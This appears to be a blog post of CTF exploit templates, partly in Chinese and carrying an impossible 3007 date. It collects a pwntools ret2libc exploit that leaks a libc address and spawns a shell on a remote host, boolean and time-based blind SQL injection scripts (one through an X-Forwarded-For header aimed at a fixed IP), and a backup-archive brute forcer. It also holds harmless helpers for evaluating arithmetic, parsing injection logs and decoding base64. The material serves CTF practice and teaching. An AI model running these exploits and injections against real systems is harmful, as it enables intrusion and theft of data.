EXP for ctf

Posted by Elli0t on 3007-01-09

First you hate ‘em, then you get used to ‘em. Enough time passes, gets so you depend on them. That’s institutionalized.

# Start a throwaway pwn environment (skysider/pwndocker) for one challenge.
# ${ctf_name} must be set beforehand: it becomes the container hostname and
# name, and selects the host directory mounted as /ctf/work.
#   --rm                 the container is deleted when it stops; only the
#                        bind-mounted ./${ctf_name} directory survives
#   -v ...:/ctf/work     challenge files stay on the host, editable from both sides
#   -p 23946:23946       publishes the port the IDA debug server uses by default
#   --cap-add=SYS_PTRACE lets gdb attach to processes inside the container;
#                        it also grants more than the default capability set,
#                        so keep it to disposable CTF boxes
docker run -d \
--rm \
-h ${ctf_name} \
--name ${ctf_name} \
-v $(pwd)/${ctf_name}:/ctf/work \
-p 23946:23946 \
--cap-add=SYS_PTRACE \
skysider/pwndocker

# Open an interactive shell in the running container.
docker exec -it ${ctf_name} /bin/bash

记录一些 exp 常用模版

PWN

ret2libc

from pwn import *
import time   # not used in this template

# Terminal pwntools opens for gdb.attach(): a new horizontal tmux split.
context.terminal=["tmux","sp","-h"]
# 'debug' makes pwntools dump every byte sent to / received from the tube.
context.log_level='debug'

DEBUG = 0              # 1: attach gdb to the local process before exploiting
LOCAL = True           # reassigned in __main__ from argv
BIN = './level3_x64'   # challenge binary; its PLT/GOT entries are read in exploit()
HOST = 'node3.buuoj.cn'
PORT = 27939

def exploit(sh):
    """Two-stage ret2libc over the stack overflow in 'vulnerable_function'.

    Stage 1: overflow the buffer (0x80 bytes plus 8 bytes that presumably
    cover the saved rbp) with a ROP chain calling write(1, write@got, ...)
    to leak the runtime address of write(), then return into
    vulnerable_function so the overflow can be triggered a second time.
    Stage 2: rebase system() and a "/bin/sh" string from the leak, call
    system("/bin/sh") and hand the tube over with interactive().

    sh: pwntools tube (process or remote) already attached to the target.
    Reads the module-level `elf` set in __main__.  Offsets come from
    ./libc-2.19.so, so the target's libc must be that exact build or the
    derived addresses are wrong; the two gadget addresses are fixed for
    level3_x64 and have to be re-found for any other binary.
    """
    libc = ELF('./libc-2.19.so')
    # libc-relative offsets: everything is derived from the distance between
    # write and the symbol we actually want.
    sys_lib_addr = libc.symbols['system']
    write_lib_addr = libc.symbols['write']
    bin_lib_addr = libc.search('/bin/sh').next()   # Python 2 iterator API
    #eli0t
    write_plt = elf.symbols['write']
    write_got = elf.got['write']
    vulner_addr = elf.symbols['vulnerable_function']
    # Gadgets in the binary: 0x4006b3 pops rdi.  0x4006b1 is fed two values
    # (write_got and a dummy 0x1), so it presumably pops rsi plus one more
    # register before returning -- confirm against the disassembly.
    rdi = 0x4006b3
    rsi = 0x4006b1
    # write(1, write_got, <rdx>): rdx is not set by the chain, so the leak
    # length is whatever it happens to hold; only 8 bytes are consumed below.
    payload = 0x80*'a' + 0x8*'b' + p64(rdi) + p64(0x1) + p64(rsi) + p64(write_got) + p64(0x1) + p64(write_plt) + p64(vulner_addr)
    # Stack after the overflow, highest address first:
    # []high
    # []vulner_addr
    # []write_plt
    # []0x1
    # []write_got
    # []rsi
    # []0x1
    # []rdi
    # []…140
    # []low
    sh.recvuntil('Input:\n')
    sh.sendline(payload)
    # First 8 bytes written back are write@libc, little endian.
    write_true = u64(sh.recv(8))
    # runtime = leaked write - offset(write) + offset(target)
    sys_true = write_true - write_lib_addr + sys_lib_addr
    bin_true = write_true - write_lib_addr + bin_lib_addr # here
    # system("/bin/sh"); the trailing 0x1 is presumably just filler for the
    # address system() returns into.
    payload_2 = 0x80*'a' + 0x8*'b' + p64(rdi) + p64(bin_true) + p64(sys_true) + p64(0x1)
    sh.recvuntil('Input:\n')
    sh.sendline(payload_2)
    sh.interactive()
    return

if __name__ == '__main__':
    # exploit() reads `elf` as a global; it is loaded here, not in the function.
    elf = ELF(BIN)
    # Any extra argv entry selects the remote target; `sys` is provided by
    # `from pwn import *`.
    if len(sys.argv) > 1:
        LOCAL = False
        sh = remote(HOST,PORT)
        exploit(sh)
    else:
        LOCAL = True
        sh = process(BIN)
        log.info('PID: ' + str(proc.pidof(sh)[0]))
        # pause
        if DEBUG:
            gdb.attach(sh)
        exploit(sh)

Web

布尔盲注

import requests


url = "?id="   # placeholder: prefix with the challenge URL before running
result = ""
# Recover characters 20..49 one at a time.  Each request asks the oracle
# "ascii(char i) > mid ?"; "YES" in the response body means true, and the
# answers drive a binary search over the ASCII range 32..127.
for i in range(20,50):
    low = 32
    high =128
    mid = (high+low)//2
    while(low<high):
        payload ="0^" + "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i,mid)
        html = requests.get(url+payload)
        print(low,high,mid,":")
        print(url+payload)
        if "YES" in html.text:
            low = mid+1
        else:
            high = mid
        mid = (high+low)//2
    # NOTE(review): if the search collapses onto either end of the range the
    # `break` leaves the outer loop, so a character at the edge of the range
    # ends the whole recovery instead of being skipped.
    if(low ==32 or high==128):
        break
    result = result + chr(mid)   # low == high == mid here
    print(result)
print("flag: " ,result)

时间注入

import string
import requests
# Candidate alphabet, tried in this order for every position.
str_con=string.ascii_letters+string.digits

url='http://123.206.87.240:8002/web15/'
# Time-based oracle injected through X-Forwarded-For: when the guessed
# character is right the query sleeps 5 s, which trips the 3 s client timeout.
sql_into="127.0.0.1'+(select case when (substr((select flag from flag)from {0} for 1))='{1}' then sleep(5) else 1 end) and '1'='1"
#sql_into="127.0.0.1'+(select case when (substr((select flag from flag)from {0} for 1))='{1}' then sleep(5) else 1 end) %23 "
#substr('abc' from 1 for 1) is the SQL-standard spelling of substr('abc', 1, 1)
#SELECT CASE WHEN expr THEN expr ELSE expr END is equivalent to IF(expr, TRUE, FALSE)
flag=''
for i in range(1,35):
    for j in str_con:
        try:
            headers={
                'X-Forwarded-For':sql_into.format(str(i),j)
            }
            # A ReadTimeout is the only "true" signal, so a slow network or an
            # unrelated server delay is read as a hit as well.
            re=requests.get(url,headers=headers,timeout=3)
        except requests.exceptions.ReadTimeout:
            flag += j
            print (flag)
            break
    # NOTE(review): when no candidate times out for this position nothing is
    # appended, so a character outside str_con is dropped and the rest of the
    # output shifts left by one.
print('the final flag is '+flag)

爆破

import requests
# Every response body is appended here.  NOTE(review): never closed
# explicitly; it relies on interpreter shutdown to flush.
qwe=open("1.txt","w")
# Common backup-archive names and extensions, tried in every combination.
name=['web','website','backup','back','www','wwwroot','temp']
suffix=['tar','tar.gz','zip','rar']
for i in name:
    for j in suffix:
        url="http://challenge-049c6ebba1992bc1.sandbox.ctfhub.com:10080/%s.%s" % (i,j)
        web=requests.get(url)
        qwe.write(web.text)
        if web.status_code==200:
            print("warn!The flag is in %s" % url)
            # Fetches the same URL a second time only to print it; web.text
            # already holds that body.
            print(requests.get(url).text)

正则匹配

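import ast
import operator
import re

# The only binary operators the regex below can produce that we are willing to
# evaluate.  '**' (two '*' in a row) is deliberately absent: eval() would
# compute it, but a huge power on challenge-supplied text can hang the script.
_BIN_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
}
_UNARY_OPS = {
    ast.UAdd: operator.pos,
    ast.USub: operator.neg,
}


def _eval_arith(expr):
    """Evaluate a string of integers joined by +, - and * without eval().

    The text is parsed with ``ast`` and walked by hand, so anything other than
    integer literals, unary +/- and the three binary operators raises
    ValueError instead of being executed.  eval() on text pulled out of a
    challenge page would run whatever code the regex let through; this keeps
    the template safe to point at untrusted input.

    expr: expression text such as "12+3*4".
    Returns the integer result (Python ints do not overflow).
    Raises SyntaxError if *expr* is not valid Python syntax (eval did the same)
    and ValueError for any construct outside the allowed subset.
    """
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and type(node.value) is int:
            return node.value
        if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY_OPS:
            return _UNARY_OPS[type(node.op)](walk(node.operand))
        if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
            return _BIN_OPS[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError("unsupported expression element: %s" % type(node).__name__)

    return walk(ast.parse(expr, mode="eval"))


source='dskfjnvsijefhg1231342341234+123124234-12423524352345*43563743652637+134256453764534-1345643q2sdafewrq34egfrq3wef;fl[splv]'
# Pull the first run of digits and + - * (the class also admits '[') that ends
# in a digit out of the noise.  re.search() returns None when nothing matches,
# so .group() raises AttributeError on input without any expression.
expression = re.search(r"([\d+[+\-\*])+\d+", source).group()
print(expression)
print(_eval_arith(expression))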

Misc

流量审计(盲注流量)

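# -*- coding: utf-8 -*-
import re


def recover_flag(log_path='test4.txt', positions=range(1, 40)):
    """Rebuild the value a boolean-based blind SQL injection leaked, from a request log.

    Every line of *log_path* is expected to hold one decoded request containing
    the probe ``<pos>,1))><value>`` (the tail of the ORD(MID(...)) > value
    expression shown below), where <pos> is the 1-based character position and
    <value> the ASCII code it was compared against.  For each requested
    position the largest value probed is taken and chr(value + 1) appended,
    on the assumption that the attacker's search stops once "> value" has been
    confirmed true.  A position with no matching line contributes chr(0).

    log_path: text file with one request per line.
    positions: character positions to recover, in output order.
    Returns the recovered string.
    Raises OSError if the log cannot be opened.
    """
    # Read the log once up front; reopening it for every position would leave
    # a handle open per iteration until the end of the run.
    with open(log_path, 'r') as f:
        lines = f.readlines()

    flag = ''
    for i in positions:
        # (?<!\d) stops the probe for position 1 from also matching the lines
        # for positions 11, 21 and 31; (\d+) reads the whole compared value
        # instead of a fixed three characters.
        probe = re.compile(r'(?<!\d)' + str(i) + r',1\)\)>(\d+)')
        tmp = 0
        for line in lines:
            data = probe.search(line)
            if data:
                print(data.group())
                value = int(data.group(1))
                print(value)
                if value >= tmp:
                    tmp = value + 1
        flag = flag + chr(tmp)
    return flag


if __name__ == '__main__':
    print(recover_flag())

# Shape of the injected query the log lines come from:
#   SELECT * from news where id =1 AND
#   ORD(
#   MID(
#   (SELECT IFNULL(
#   CAST(flag_here AS CHAR),0x20
#   ) FROM sqltest.flag ORDER BY flag_here LIMIT 0,1)
#   ,1,1)
#   )
#   >112

# https://blog.csdn.net/qq_40519543/article/details/107135902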

base64 to str

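import base64


def decode_base64_lines(src_path="base.txt", dst_path="resu.txt"):
    """Decode every base64 line of *src_path* and append the text to *dst_path*.

    Each input line is decoded on its own and written as produced: no
    separator is added, so a newline appears in the output only if one was
    encoded.  The decoded bytes are interpreted as UTF-8 (bytes.decode()
    with no arguments).  Both files are closed on every exit path.

    src_path: file with one base64 string per line.
    dst_path: file the decoded text is appended to.
    Returns the number of lines decoded.
    Raises binascii.Error on malformed base64, UnicodeDecodeError when the
    decoded bytes are not valid UTF-8, and OSError if a file cannot be opened.
    """
    count = 0
    with open(src_path, "r") as base, open(dst_path, "a") as resu:
        for line in base:
            # b64decode ignores the trailing newline (non-alphabet characters
            # are discarded in non-validating mode).
            resu.write(base64.b64decode(line).decode())
            count += 1
    return count


if __name__ == "__main__":
    decode_base64_lines()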